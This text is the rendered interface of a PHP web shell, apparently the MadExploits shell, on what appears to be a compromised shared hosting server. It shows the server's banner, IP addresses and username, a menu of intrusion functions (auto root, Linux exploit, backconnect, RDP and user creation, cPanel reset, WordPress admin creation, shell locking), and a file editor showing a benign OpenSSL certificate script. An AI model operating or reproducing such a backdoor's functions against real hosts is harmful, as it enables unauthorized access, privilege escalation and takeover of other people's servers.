Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs14 /
root /
etc /
pki /
tls /
certs /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
2.46
KB
-rw-r--r--
make-dummy-cert
636
B
-rwxr-xr-x
renew-dummy-cert
856
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : renew-dummy-cert
#!/bin/bash if [ $# -eq 0 ]; then echo $"Usage: `basename $0` filename" 1>&2 exit 1 fi PEM=$1 REQ=`/bin/mktemp /tmp/openssl.XXXXXX` KEY=`/bin/mktemp /tmp/openssl.XXXXXX` CRT=`/bin/mktemp /tmp/openssl.XXXXXX` NEW=${PEM}_ trap "rm -f $REQ $KEY $CRT $NEW" SIGINT if [ ! -f $PEM ]; then echo "$PEM: file not found" 1>&2 exit 1 fi umask 077 OWNER=`ls -l $PEM | awk '{ printf "%s.%s", $3, $4; }'` /opt/alt/alt-nodejs14/root/usr/bin/openssl rsa -inform pem -in $PEM -out $KEY /opt/alt/alt-nodejs14/root/usr/bin/openssl x509 -x509toreq -in $PEM -signkey $KEY -out $REQ /opt/alt/alt-nodejs14/root/usr/bin/openssl x509 -req -in $REQ -signkey $KEY -days 365 \ -extfile /opt/alt/alt-nodejs14/root/etc/pki/tls/openssl.cnf -extensions v3_ca -out $CRT (cat $KEY ; echo "" ; cat $CRT) > $NEW chown $OWNER $NEW mv -f $NEW $PEM rm -f $REQ $KEY $CRT exit 0
Close